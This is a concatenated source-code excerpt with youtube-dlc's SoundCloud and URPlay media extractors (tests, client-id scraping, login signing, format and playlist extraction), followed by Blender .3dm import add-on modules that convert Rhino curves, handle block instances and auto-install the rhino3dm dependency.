'description': 'md5:fa20ee0fca76a3d6df8c7e57f3715366',
'uploader': 'Ori Uplift Music',
'uploader_id': '12563093',
'timestamp': 1504206263,
'upload_date': '20170831',
'duration': 7449.096,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# no album art, use avatar pic for thumbnail
{
'url': 'https://soundcloud.com/garyvee/sideways-prod-mad-real',
'md5': '59c7872bc44e5d99b7211891664760c2',
'info_dict': {
'id': '309699954',
'ext': 'mp3',
'title': 'Sideways (Prod. Mad Real)',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'uploader': 'garyvee',
'uploader_id': '2366352',
'timestamp': 1488152409,
'upload_date': '20170226',
'duration': 207.012,
'thumbnail': r're:https?://.*\.jpg',
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://soundcloud.com/giovannisarani/mezzo-valzer',
'md5': 'e22aecd2bc88e0e4e432d7dcc0a1abf7',
'info_dict': {
'id': '583011102',
'ext': 'mp3',
'title': 'Mezzo Valzer',
'description': 'md5:4138d582f81866a530317bae316e8b61',
'uploader': 'Micronie',
'uploader_id': '3352531',
'timestamp': 1551394171,
'upload_date': '20190228',
'duration': 180.157,
'thumbnail': r're:https?://.*\.jpg',
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
{
# AAC HQ format available (account with active subscription needed)
'url': 'https://soundcloud.com/wandw/the-chainsmokers-ft-daya-dont-let-me-down-ww-remix-1',
'only_matching': True,
},
{
# Go+ (account with active subscription needed)
'url': 'https://soundcloud.com/taylorswiftofficial/look-what-you-made-me-do',
'only_matching': True,
},
]
_API_V2_BASE = 'https://api-v2.soundcloud.com/'
_BASE_URL = 'https://soundcloud.com/'
_IMAGE_REPL_RE = r'-([0-9a-z]+)\.jpg'
_ARTWORK_MAP = {
'mini': 16,
'tiny': 20,
'small': 32,
'badge': 47,
't67x67': 67,
'large': 100,
't300x300': 300,
'crop': 400,
't500x500': 500,
'original': 0,
}
def _store_client_id(self, client_id):
self._downloader.cache.store('soundcloud', 'client_id', client_id)
def _update_client_id(self):
webpage = self._download_webpage('https://soundcloud.com/', None)
for src in reversed(re.findall(r'<script[^>]+src="([^"]+)"', webpage)):
script = self._download_webpage(src, None, fatal=False)
if script:
client_id = self._search_regex(
r'client_id\s*:\s*"([0-9a-zA-Z]{32})"',
script, 'client id', default=None)
if client_id:
self._CLIENT_ID = client_id
self._store_client_id(client_id)
return
raise ExtractorError('Unable to extract client id')
def _download_json(self, *args, **kwargs):
non_fatal = kwargs.get('fatal') is False
if non_fatal:
del kwargs['fatal']
query = kwargs.get('query', {}).copy()
for _ in range(2):
query['client_id'] = self._CLIENT_ID
kwargs['query'] = query
try:
return super(SoundcloudIE, self)._download_json(*args, **compat_kwargs(kwargs))
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 401:
self._store_client_id(None)
self._update_client_id()
continue
elif non_fatal:
self._downloader.report_warning(error_to_compat_str(e))
return False
raise
def _real_initialize(self):
self._CLIENT_ID = self._downloader.cache.load('soundcloud', 'client_id') or "T5R4kgWS2PRf6lzLyIravUMnKlbIxQag" # 'EXLwg5lHTO2dslU5EePe3xkw0m1h86Cd' # 'YUKXoArFcqrlQn9tfNHvvyfnDISj04zk'
self._login()
_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
_API_AUTH_QUERY_TEMPLATE = '?client_id=%s'
_API_AUTH_URL_PW = 'https://api-auth.soundcloud.com/web-auth/sign-in/password%s'
_access_token = None
_HEADERS = {}
_NETRC_MACHINE = 'soundcloud'
def _login(self):
username, password = self._get_login_info()
if username is None:
return
def genDevId():
def genNumBlock():
return ''.join([str(random.randrange(10)) for i in range(6)])
return '-'.join([genNumBlock() for i in range(4)])
payload = {
'client_id': self._CLIENT_ID,
'recaptcha_pubkey': 'null',
'recaptcha_response': 'null',
'credentials': {
'identifier': username,
'password': password
},
'signature': self.sign(username, password, self._CLIENT_ID),
'device_id': genDevId(),
'user_agent': self._USER_AGENT
}
query = self._API_AUTH_QUERY_TEMPLATE % self._CLIENT_ID
login = sanitized_Request(self._API_AUTH_URL_PW % query, json.dumps(payload).encode('utf-8'))
response = self._download_json(login, None)
self._access_token = response.get('session').get('access_token')
if not self._access_token:
self.report_warning('Unable to get access token, login may has failed')
else:
self._HEADERS = {'Authorization': 'OAuth ' + self._access_token}
# signature generation
def sign(self, user, pw, clid):
a = 33
i = 1
s = 440123
w = 117
u = 1800000
l = 1042
b = 37
k = 37
c = 5
n = "<KEY>" # _KEY
y = "8" # _REV
r = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" # _USER_AGENT
e = user # _USERNAME
t = clid # _CLIENT_ID
d = '-'.join([str(mInt) for mInt in [a, i, s, w, u, l, b, k]])
p = n + y + d + r + e + t + d + n
h = p
m = 8011470
f = 0
for f in range(f, len(h)):
m = (m >> 1) + ((1 & m) << 23)
m += ord(h[f])
m &= 16777215
# c is not even needed
out = str(y) + ':' + str(d) + ':' + format(m, 'x') + ':' + str(c)
return out
@classmethod
def _resolv_url(cls, url):
return SoundcloudIE._API_V2_BASE + 'resolve?url=' + url
def _extract_info_dict(self, info, full_title=None, secret_token=None):
track_id = compat_str(info['id'])
title = info['title']
format_urls = set()
formats = []
query = {'client_id': self._CLIENT_ID}
if secret_token:
query['secret_token'] = secret_token
if info.get('downloadable') and info.get('has_downloads_left'):
download_url = update_url_query(
self._API_V2_BASE + 'tracks/' + track_id + '/download', query)
redirect_url = (self._download_json(download_url, track_id, fatal=False) or {}).get('redirectUri')
if redirect_url:
urlh = self._request_webpage(
HEADRequest(redirect_url), track_id, fatal=False)
if urlh:
format_url = urlh.geturl()
format_urls.add(format_url)
formats.append({
'format_id': 'download',
'ext': urlhandle_detect_ext(urlh) or 'mp3',
'filesize': int_or_none(urlh.headers.get('Content-Length')),
'url': format_url,
'preference': 10,
})
def invalid_url(url):
return not url or url in format_urls
def add_format(f, protocol, is_preview=False):
mobj = re.search(r'\.(?P<abr>\d+)\.(?P<ext>[0-9a-z]{3,4})(?=[/?])', stream_url)
if mobj:
for k, v in mobj.groupdict().items():
if not f.get(k):
f[k] = v
format_id_list = []
if protocol:
format_id_list.append(protocol)
ext = f.get('ext')
if ext == 'aac':
f['abr'] = '256'
for k in ('ext', 'abr'):
v = f.get(k)
if v:
format_id_list.append(v)
preview = is_preview or re.search(r'/(?:preview|playlist)/0/30/', f['url'])
if preview:
format_id_list.append('preview')
abr = f.get('abr')
if abr:
f['abr'] = int(abr)
if protocol == 'hls':
protocol = 'm3u8' if ext == 'aac' else 'm3u8_native'
else:
protocol = 'http'
f.update({
'format_id': '_'.join(format_id_list),
'protocol': protocol,
'preference': -10 if preview else None,
})
formats.append(f)
# New API
transcodings = try_get(
info, lambda x: x['media']['transcodings'], list) or []
for t in transcodings:
if not isinstance(t, dict):
continue
format_url = url_or_none(t.get('url'))
if not format_url:
continue
stream = self._download_json(
format_url, track_id, query=query, fatal=False, headers=self._HEADERS)
if not isinstance(stream, dict):
continue
stream_url = url_or_none(stream.get('url'))
if invalid_url(stream_url):
continue
format_urls.add(stream_url)
stream_format = t.get('format') or {}
protocol = stream_format.get('protocol')
if protocol != 'hls' and '/hls' in format_url:
protocol = 'hls'
ext = None
preset = str_or_none(t.get('preset'))
if preset:
ext = preset.split('_')[0]
if ext not in KNOWN_EXTENSIONS:
ext = mimetype2ext(stream_format.get('mime_type'))
add_format({
'url': stream_url,
'ext': ext,
}, 'http' if protocol == 'progressive' else protocol,
t.get('snipped') or '/preview/' in format_url)
for f in formats:
f['vcodec'] = 'none'
if not formats and info.get('policy') == 'BLOCK':
self.raise_geo_restricted()
self._sort_formats(formats)
user = info.get('user') or {}
thumbnails = []
artwork_url = info.get('artwork_url')
thumbnail = artwork_url or user.get('avatar_url')
if isinstance(thumbnail, compat_str):
if re.search(self._IMAGE_REPL_RE, thumbnail):
for image_id, size in self._ARTWORK_MAP.items():
i = {
'id': image_id,
'url': re.sub(self._IMAGE_REPL_RE, '-%s.jpg' % image_id, thumbnail),
}
if image_id == 'tiny' and not artwork_url:
size = 18
elif image_id == 'original':
i['preference'] = 10
if size:
i.update({
'width': size,
'height': size,
})
thumbnails.append(i)
else:
thumbnails = [{'url': thumbnail}]
def extract_count(key):
return int_or_none(info.get('%s_count' % key))
return {
'id': track_id,
'uploader': user.get('username'),
'uploader_id': str_or_none(user.get('id')) or user.get('permalink'),
'uploader_url': user.get('permalink_url'),
'timestamp': unified_timestamp(info.get('created_at')),
'title': title,
'description': info.get('description'),
'thumbnails': thumbnails,
'duration': float_or_none(info.get('duration'), 1000),
'webpage_url': info.get('permalink_url'),
'license': info.get('license'),
'view_count': extract_count('playback'),
'like_count': extract_count('favoritings') or extract_count('likes'),
'comment_count': extract_count('comment'),
'repost_count': extract_count('reposts'),
'genre': info.get('genre'),
'formats': formats
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
track_id = mobj.group('track_id')
query = {}
if track_id:
info_json_url = self._API_V2_BASE + 'tracks/' + track_id
full_title = track_id
token = mobj.group('secret_token')
if token:
query['secret_token'] = token
else:
full_title = resolve_title = '%s/%s' % mobj.group('uploader', 'title')
token = mobj.group('token')
if token:
resolve_title += '/%s' % token
info_json_url = self._resolv_url(self._BASE_URL + resolve_title)
info = self._download_json(
info_json_url, full_title, 'Downloading info JSON', query=query, headers=self._HEADERS)
return self._extract_info_dict(info, full_title, token)
class SoundcloudPlaylistBaseIE(SoundcloudIE):
def _extract_set(self, playlist, token=None):
playlist_id = compat_str(playlist['id'])
tracks = playlist.get('tracks') or []
if not all([t.get('permalink_url') for t in tracks]) and token:
tracks = self._download_json(
self._API_V2_BASE + 'tracks', playlist_id,
'Downloading tracks', query={
'ids': ','.join([compat_str(t['id']) for t in tracks]),
'playlistId': playlist_id,
'playlistSecretToken': token,
}, headers=self._HEADERS)
entries = []
for track in tracks:
track_id = str_or_none(track.get('id'))
url = track.get('permalink_url')
if not url:
if not track_id:
continue
url = self._API_V2_BASE + 'tracks/' + track_id
if token:
url += '?secret_token=' + token
entries.append(self.url_result(
url, SoundcloudIE.ie_key(), track_id))
return self.playlist_result(
entries, playlist_id,
playlist.get('title'),
playlist.get('description'))
class SoundcloudSetIE(SoundcloudPlaylistBaseIE):
_VALID_URL = r'https?://(?:(?:www|m)\.)?soundcloud\.com/(?P<uploader>[\w\d-]+)/sets/(?P<slug_title>[:\w\d-]+)(?:/(?P<token>[^?/]+))?'
IE_NAME = 'soundcloud:set'
_TESTS = [{
'url': 'https://soundcloud.com/the-concept-band/sets/the-royal-concept-ep',
'info_dict': {
'id': '2284613',
'title': 'The Royal Concept EP',
'description': 'md5:71d07087c7a449e8941a70a29e34671e',
},
'playlist_mincount': 5,
}, {
'url': 'https://soundcloud.com/the-concept-band/sets/the-royal-concept-ep/token',
'only_matching': True,
}, {
'url': 'https://soundcloud.com/discover/sets/weekly::flacmatic',
'only_matching': True,
}, {
'url': 'https://soundcloud.com/discover/sets/charts-top:all-music:de',
'only_matching': True,
}, {
'url': 'https://soundcloud.com/discover/sets/charts-top:hiphoprap:kr',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
full_title = '%s/sets/%s' % mobj.group('uploader', 'slug_title')
token = mobj.group('token')
if token:
full_title += '/' + token
info = self._download_json(self._resolv_url(
self._BASE_URL + full_title), full_title, headers=self._HEADERS)
if 'errors' in info:
msgs = (compat_str(err['error_message']) for err in info['errors'])
raise ExtractorError('unable to download video webpage: %s' % ','.join(msgs))
return self._extract_set(info, token)
class SoundcloudPagedPlaylistBaseIE(SoundcloudIE):
def _extract_playlist(self, base_url, playlist_id, playlist_title):
# Per the SoundCloud documentation, the maximum limit for a linked partioning query is 200.
# https://developers.soundcloud.com/blog/offset-pagination-deprecated
COMMON_QUERY = {
'limit': 200,
'linked_partitioning': '1',
}
query = COMMON_QUERY.copy()
query['offset'] = 0
next_href = base_url
entries = []
for i in itertools.count():
response = self._download_json(
next_href, playlist_id,
'Downloading track page %s' % (i + 1), query=query, headers=self._HEADERS)
collection = response['collection']
if not isinstance(collection, list):
collection = []
# Empty collection may be returned, in this case we proceed
# straight to next_href
def resolve_entry(candidates):
for cand in candidates:
if not isinstance(cand, dict):
continue
permalink_url = url_or_none(cand.get('permalink_url'))
if not permalink_url:
continue
return self.url_result(
permalink_url,
SoundcloudIE.ie_key() if SoundcloudIE.suitable(permalink_url) else None,
str_or_none(cand.get('id')), cand.get('title'))
for e in collection:
entry = resolve_entry((e, e.get('track'), e.get('playlist')))
if entry:
entries.append(entry)
next_href = response.get('next_href')
if not next_href:
break
next_href = response['next_href']
parsed_next_href = compat_urlparse.urlparse(next_href)
query = compat_urlparse.parse_qs(parsed_next_href.query)
query.update(COMMON_QUERY)
return {
'_type': 'playlist',
'id': playlist_id,
'title': playlist_title,
'entries': entries,
}
class SoundcloudUserIE(SoundcloudPagedPlaylistBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:(?:www|m)\.)?soundcloud\.com/
(?P<user>[^/]+)
(?:/
(?P<rsrc>tracks|albums|sets|reposts|likes|spotlight)
)?
/?(?:[?#].*)?$
'''
IE_NAME = 'soundcloud:user'
_TESTS = [{
'url': 'https://soundcloud.com/soft-cell-official',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (All)',
},
'playlist_mincount': 28,
}, {
'url': 'https://soundcloud.com/soft-cell-official/tracks',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (Tracks)',
},
'playlist_mincount': 27,
}, {
'url': 'https://soundcloud.com/soft-cell-official/albums',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (Albums)',
},
'playlist_mincount': 1,
}, {
'url': 'https://soundcloud.com/jcv246/sets',
'info_dict': {
'id': '12982173',
'title': 'Jordi / cv (Sets)',
},
'playlist_mincount': 2,
}, {
'url': 'https://soundcloud.com/jcv246/reposts',
'info_dict': {
'id': '12982173',
'title': 'Jordi / cv (Reposts)',
},
'playlist_mincount': 6,
}, {
'url': 'https://soundcloud.com/clalberg/likes',
'info_dict': {
'id': '11817582',
'title': 'clalberg (Likes)',
},
'playlist_mincount': 5,
}, {
'url': 'https://soundcloud.com/grynpyret/spotlight',
'info_dict': {
'id': '7098329',
'title': 'Grynpyret (Spotlight)',
},
'playlist_mincount': 1,
}]
_BASE_URL_MAP = {
'all': 'stream/users/%s',
'tracks': 'users/%s/tracks',
'albums': 'users/%s/albums',
'sets': 'users/%s/playlists',
'reposts': 'stream/users/%s/reposts',
'likes': 'users/%s/likes',
'spotlight': 'users/%s/spotlight',
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
uploader = mobj.group('user')
user = self._download_json(
self._resolv_url(self._BASE_URL + uploader),
uploader, 'Downloading user info', headers=self._HEADERS)
resource = mobj.group('rsrc') or 'all'
return self._extract_playlist(
self._API_V2_BASE + self._BASE_URL_MAP[resource] % user['id'],
str_or_none(user.get('id')),
'%s (%s)' % (user['username'], resource.capitalize()))
class SoundcloudTrackStationIE(SoundcloudPagedPlaylistBaseIE):
_VALID_URL = r'https?://(?:(?:www|m)\.)?soundcloud\.com/stations/track/[^/]+/(?P<id>[^/?#&]+)'
IE_NAME = 'soundcloud:trackstation'
_TESTS = [{
'url': 'https://soundcloud.com/stations/track/officialsundial/your-text',
'info_dict': {
'id': '286017854',
'title': 'Track station: your text',
},
'playlist_mincount': 47,
}]
def _real_extract(self, url):
track_name = self._match_id(url)
track = self._download_json(self._resolv_url(url), track_name, headers=self._HEADERS)
track_id = self._search_regex(
r'soundcloud:track-stations:(\d+)', track['id'], 'track id')
return self._extract_playlist(
self._API_V2_BASE + 'stations/%s/tracks' % track['id'],
track_id, 'Track station: %s' % track['title'])
class SoundcloudPlaylistIE(SoundcloudPlaylistBaseIE):
_VALID_URL = r'https?://api(?:-v2)?\.soundcloud\.com/playlists/(?P<id>[0-9]+)(?:/?\?secret_token=(?P<token>[^&]+?))?$'
IE_NAME = 'soundcloud:playlist'
_TESTS = [{
'url': 'https://api.soundcloud.com/playlists/4110309',
'info_dict': {
'id': '4110309',
'title': 'TILT Brass - Bowery Poetry Club, August \'03 [Non-Site SCR 02]',
'description': 're:.*?TILT Brass - Bowery Poetry Club',
},
'playlist_count': 6,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
query = {}
token = mobj.group('token')
if token:
query['secret_token'] = token
data = self._download_json(
self._API_V2_BASE + 'playlists/' + playlist_id,
playlist_id, 'Downloading playlist', query=query, headers=self._HEADERS)
return self._extract_set(data, token)
class SoundcloudSearchIE(SearchInfoExtractor, SoundcloudIE):
IE_NAME = 'soundcloud:search'
IE_DESC = 'Soundcloud search'
_MAX_RESULTS = float('inf')
_TESTS = [{
'url': 'scsearch15:post-avant jazzcore',
'info_dict': {
'title': 'post-avant jazzcore',
},
'playlist_count': 15,
}]
_SEARCH_KEY = 'scsearch'
_MAX_RESULTS_PER_PAGE = 200
_DEFAULT_RESULTS_PER_PAGE = 50
def _get_collection(self, endpoint, collection_id, **query):
limit = min(
query.get('limit', self._DEFAULT_RESULTS_PER_PAGE),
self._MAX_RESULTS_PER_PAGE)
query.update({
'limit': limit,
'linked_partitioning': 1,
'offset': 0,
})
next_url = update_url_query(self._API_V2_BASE + endpoint, query)
collected_results = 0
for i in itertools.count(1):
response = self._download_json(
next_url, collection_id, 'Downloading page {0}'.format(i),
'Unable to download API page', headers=self._HEADERS)
collection = response.get('collection', [])
if not collection:
break
collection = list(filter(bool, collection))
collected_results += len(collection)
for item in collection:
yield self.url_result(item['uri'], SoundcloudIE.ie_key())
if not collection or collected_results >= limit:
break
next_url = response.get('next_href')
if not next_url:
break
def _get_n_results(self, query, n):
tracks = self._get_collection('search/tracks', query, limit=n, q=query)
return self.playlist_result(tracks, playlist_title=query)
```
#### File: youtube_dlc/extractor/urplay.py
```python
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import unified_timestamp
import re
class URPlayIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?ur(?:play|skola)\.se/(?:program|Produkter)/(?P<id>[0-9]+)'
_TESTS = [{
'url': 'https://urplay.se/program/203704-ur-samtiden-livet-universum-och-rymdens-markliga-musik-om-vetenskap-kritiskt-tankande-och-motstand',
'md5': 'ff5b0c89928f8083c74bbd5099c9292d',
'info_dict': {
'id': '203704',
'ext': 'mp4',
'title': 'Om vetenskap, kritiskt tänkande och motstånd',
'description': 'md5:5344508a52aa78c1ced6c1b8b9e44e9a',
'timestamp': 1513292400,
'upload_date': '20171214',
},
}, {
'url': 'https://urskola.se/Produkter/190031-Tripp-Trapp-Trad-Sovkudde',
'info_dict': {
'id': '190031',
'ext': 'mp4',
'title': 'Tripp, Trapp, Träd : Sovkudde',
'description': 'md5:b86bffdae04a7e9379d1d7e5947df1d1',
'timestamp': 1440093600,
'upload_date': '20150820',
},
}, {
'url': 'http://urskola.se/Produkter/155794-Smasagor-meankieli-Grodan-i-vida-varlden',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
urplayer_data = re.sub(""", "\"", self._search_regex(
r'components\/Player\/Player\" data-react-props=\"({.+?})\"',
webpage, 'urplayer data'))
urplayer_data = self._parse_json(urplayer_data, video_id)
for i in range(len(urplayer_data['accessibleEpisodes'])):
if urplayer_data.get('accessibleEpisodes', {})[i].get('id') == int(video_id):
urplayer_data = urplayer_data['accessibleEpisodes'][i]
break
host = self._download_json('http://streaming-loadbalancer.ur.se/loadbalancer.json', video_id)['redirect']
formats = []
urplayer_streams = urplayer_data.get("streamingInfo")
for quality in ('sd'), ('hd'):
location = (urplayer_streams.get("raw", {}).get(quality, {}).get("location")
or urplayer_streams.get("sweComplete", {}).get(quality, {}).get("location"))
if location:
formats.extend(self._extract_wowza_formats(
'http://%s/%s/playlist.m3u8' % (host, location), video_id,
skip_protocols=['f4m', 'rtmp', 'rtsp']))
self._sort_formats(formats)
subtitles = {}
subs = urplayer_streams.get("sweComplete", {}).get("tt", {}).get("location")
if subs:
subtitles.setdefault('Svenska', []).append({
'url': subs,
})
return {
'id': video_id,
'title': urplayer_data['title'],
'description': self._og_search_description(webpage),
'thumbnail': urplayer_data.get('image', {}).get('1280x720'),
'timestamp': unified_timestamp(self._html_search_meta(('uploadDate', 'schema:uploadDate'),
webpage, 'timestamp')),
'series': urplayer_data.get('seriesTitle'),
'subtitles': subtitles,
'formats': formats,
}
```
|
{
"source": "jesterKing/import_3dm",
"score": 2
}
|
#### File: import_3dm/converters/curve.py
```python
import rhino3dm as r3d
from . import utils
from mathutils import Vector
CONVERT = {}
def import_null(rcurve, bcurve, scale):
print("Failed to convert type", type(rcurve))
return None
def import_line(rcurve, bcurve, scale):
fr = rcurve.Line.From
to = rcurve.Line.To
line = bcurve.splines.new('POLY')
line.points.add(1)
line.points[0].co = (fr.X * scale, fr.Y * scale, fr.Z * scale, 1)
line.points[1].co = (to.X * scale, to.Y * scale, to.Z * scale, 1)
return line
CONVERT[r3d.LineCurve] = import_line
def import_polyline(rcurve, bcurve, scale):
N = rcurve.PointCount
polyline = bcurve.splines.new('POLY')
polyline.use_cyclic_u = rcurve.IsClosed
if rcurve.IsClosed:
N -= 1
polyline.points.add(N - 1)
for i in range(0, N):
rpt = rcurve.Point(i)
polyline.points[i].co = (rpt.X * scale, rpt.Y * scale, rpt.Z * scale, 1)
return polyline
CONVERT[r3d.PolylineCurve] = import_polyline
def import_nurbs_curve(rcurve, bcurve, scale):
N = len(rcurve.Points)
nurbs = bcurve.splines.new('NURBS')
nurbs.use_cyclic_u = rcurve.IsClosed
nurbs.points.add(N - 1)
for i in range(0, N):
rpt = rcurve.Points[i]
nurbs.points[i].co = (rpt.X * scale, rpt.Y * scale, rpt.Z * scale, rpt.W * scale)
#nurbs.use_bezier_u = True
nurbs.use_endpoint_u = True
nurbs.order_u = rcurve.Order
return nurbs
CONVERT[r3d.NurbsCurve] = import_nurbs_curve
def import_arc(rcurve, bcurve, scale):
spt = Vector((rcurve.Arc.StartPoint.X, rcurve.Arc.StartPoint.Y, rcurve.Arc.StartPoint.Z)) * scale
ept = Vector((rcurve.Arc.EndPoint.X, rcurve.Arc.EndPoint.Y, rcurve.Arc.EndPoint.Z)) * scale
cpt = Vector((rcurve.Arc.Center.X, rcurve.Arc.Center.Y, rcurve.Arc.Center.Z)) * scale
r1 = spt - cpt
r2 = ept - cpt
r1.normalize()
r2.normalize()
d = rcurve.Arc.Length * scale
normal = r1.cross(r2)
t1 = normal.cross(r1)
t2 = normal.cross(r2)
'''
Temporary arc
'''
arc = bcurve.splines.new('NURBS')
arc.use_cyclic_u = False
arc.points.add(3)
arc.points[0].co = (spt.x, spt.y, spt.z, 1)
sspt = spt + t1 * d * 0.33
arc.points[1].co = (sspt.x, sspt.y, sspt.z, 1)
eept = ept - t2 * d * 0.33
arc.points[2].co = (eept.x, eept.y, eept.z, 1)
arc.points[3].co = (ept.x, ept.y, ept.z, 1)
'''
print("ARC")
print(" StartPoint:", rcurve.Arc.StartPoint)
print(" EndPoint:", rcurve.Arc.EndPoint)
print(" Center:", rcurve.Arc.Center)
print(" Radius:", rcurve.Radius)
'''
arc.use_endpoint_u = True
arc.order_u = 3
return arc
CONVERT[r3d.ArcCurve] = import_arc
def import_polycurve(rcurve, bcurve, scale):
for seg in range(rcurve.SegmentCount):
segcurve = rcurve.SegmentCurve(seg)
if type(segcurve) in CONVERT.keys():
CONVERT[type(segcurve)](segcurve, bcurve, scale)
CONVERT[r3d.PolyCurve] = import_polycurve
def import_curve(context, ob, name, scale, options):
og = ob.Geometry
oa = ob.Attributes
curve_data = context.blend_data.curves.new(name, type="CURVE")
if type(og) in CONVERT.keys():
curve_data.dimensions = '3D'
curve_data.resolution_u = 2
CONVERT[type(og)](og, curve_data, scale)
return curve_data
```
#### File: import_3dm/converters/instances.py
```python
import bpy
import rhino3dm as r3d
from mathutils import Matrix
from mathutils import Vector
from math import sqrt
from . import utils
#TODO
#tag collections and references with guids
#test w/ more complex blocks and empty blocks
#proper exception handling
def handle_instance_definitions(context, model, toplayer, layername):
"""
import instance definitions from rhino model as empty collections
"""
if not layername in context.blend_data.collections:
instance_col = context.blend_data.collections.new(name=layername)
instance_col.hide_render = True
instance_col.hide_viewport = True
toplayer.children.link(instance_col)
for idef in model.InstanceDefinitions:
idef_col=utils.get_iddata(context.blend_data.collections,idef.Id, idef.Name, None )
try:
instance_col.children.link(idef_col)
except Exception:
pass
def import_instance_reference(context, ob, iref, name, scale, options):
#TODO: insert reduced mesh proxy and hide actual instance in viewport for better performance on large files
iref.empty_display_size=0.5
iref.empty_display_type='PLAIN_AXES'
iref.instance_type='COLLECTION'
iref.instance_collection = utils.get_iddata(context.blend_data.collections,ob.Geometry.ParentIdefId,"",None)
xform=list(ob.Geometry.Xform.ToFloatArray(1))
xform=[xform[0:4],xform[4:8], xform[8:12], xform[12:16]]
xform[0][3]*=scale
xform[1][3]*=scale
xform[2][3]*=scale
iref.matrix_world = Matrix(xform)
def populate_instance_definitions(context, model, toplayer, layername, options, scale):
import_as_grid = options.get("import_instances_grid_layout",False)
if import_as_grid:
count = 0
columns = int(sqrt(len(model.InstanceDefinitions)))
grid = options.get("import_instances_grid",False) *scale
#for every instance definition fish out the instance definition objects and link them to their parent
for idef in model.InstanceDefinitions:
parent=utils.get_iddata(context.blend_data.collections, idef.Id, idef.Name, None)
objectids=idef.GetObjectIds()
if import_as_grid:
#calculate position offset to lay out block definitions in xy plane
offset = Vector((count%columns * grid, (count-count%columns)/columns * grid, 0 ))
parent.instance_offset = offset #this sets the offset for the collection instances (read: resets the origin)
count +=1
for ob in context.blend_data.objects:
for uuid in objectids:
if ob.get('rhid',None) == str(uuid):
try:
parent.objects.link(ob)
if import_as_grid:
ob.location += offset #apply the previously calculated offset to all instance definition objects
except Exception:
pass
```
#### File: import_3dm/import_3dm/read3dm.py
```python
import os.path
import bpy
import sys
import os
import site
def modules_path():
# set up addons/modules under the user
# script path. Here we'll install the
# dependencies
modulespath = os.path.normpath(
os.path.join(
bpy.utils.script_path_user(),
"addons",
"modules"
)
)
if not os.path.exists(modulespath):
os.makedirs(modulespath)
# set user modules path at beginning of paths for earlier hit
if sys.path[1] != modulespath:
sys.path.insert(1, modulespath)
return modulespath
modules_path()
def install_dependencies():
modulespath = modules_path()
try:
from subprocess import run as sprun
try:
import pip
except:
print("Installing pip... "),
pyver = ""
if sys.platform != "win32":
pyver = "python{}.{}".format(
sys.version_info.major,
sys.version_info.minor
)
ensurepip = os.path.normpath(
os.path.join(
os.path.dirname(bpy.app.binary_path_python),
"..", "lib", pyver, "ensurepip"
)
)
# install pip using the user scheme using the Python
# version bundled with Blender
res = sprun([bpy.app.binary_path_python, ensurepip, "--user"])
if res.returncode == 0:
import pip
else:
raise Exception("Failed to install pip.")
print("Installing rhino3dm to {}... ".format(modulespath)),
# if we eventually want to pin a certain version
# we can add here something like "==0.0.5".
# for now assume latest available is ok
rhino3dm_version=""
pip3 = "pip3"
if sys.platform=="darwin":
pip3 = os.path.normpath(
os.path.join(
os.path.dirname(bpy.app.binary_path_python),
"..",
"bin",
pip3
)
)
# call pip in a subprocess so we don't have to mess
# with internals. Also, this ensures the Python used to
# install pip is going to be used
res = sprun([pip3, "install", "--upgrade", "--target", modulespath, "rhino3dm{}".format(rhino3dm_version)])
if res.returncode!=0:
print("Please try manually installing rhino3dm with: pip3 install --upgrade --target {} rhino3dm".format(modulespath))
raise Exception("Failed to install rhino3dm. See console for manual install instruction.")
except:
raise Exception("Failed to install dependencies. Please make sure you have pip installed.")
# TODO: add update mechanism
try:
import rhino3dm as r3d
except:
print("Failed to load rhino3dm, trying to install automatically...")
try:
install_dependencies()
# let user restart Blender, reloading of rhino3dm after automated
# install doesn't always work, better to just fail clearly before
# that
raise Exception("Please restart Blender.")
except:
raise
from . import converters
def read_3dm(context, options):
filepath = options.get("filepath", "")
model = None
try:
model = r3d.File3dm.Read(filepath)
except:
print("Failed to import .3dm model: {}".format(filepath))
return {'CANCELLED'}
top_collection_name = os.path.splitext(os.path.basename(filepath))[0]
if top_collection_name in context.blend_data.collections.keys():
toplayer = context.blend_data.collections[top_collection_name]
else:
toplayer = context.blend_data.collections.new(name=top_collection_name)
# Get proper scale for conversion
scale = r3d.UnitSystem.UnitScale(model.Settings.ModelUnitSystem, r3d.UnitSystem.Meters) / context.scene.unit_settings.scale_length
layerids = {}
materials = {}
# Parse options
import_views = options.get("import_views", False)
import_named_views = options.get("import_named_views", False)
import_hidden_objects = options.get("import_hidden_objects", False)
import_hidden_layers = options.get("import_hidden_layers", False)
import_groups = options.get("import_groups", False)
import_nested_groups = options.get("import_nested_groups", False)
import_instances = options.get("import_instances",False)
update_materials = options.get("update_materials", False)
# Import Views and NamedViews
if import_views:
converters.handle_views(context, model, toplayer, model.Views, "Views", scale)
if import_named_views:
converters.handle_views(context, model, toplayer, model.NamedViews, "NamedViews", scale)
# Handle materials
converters.handle_materials(context, model, materials, update_materials)
# Handle layers
converters.handle_layers(context, model, toplayer, layerids, materials, update_materials, import_hidden_layers)
materials[converters.DEFAULT_RHINO_MATERIAL] = None
#build skeletal hierarchy of instance definitions as collections (will be populated by object importer)
if import_instances:
converters.handle_instance_definitions(context, model, toplayer, "Instance Definitions")
# Handle objects
for ob in model.Objects:
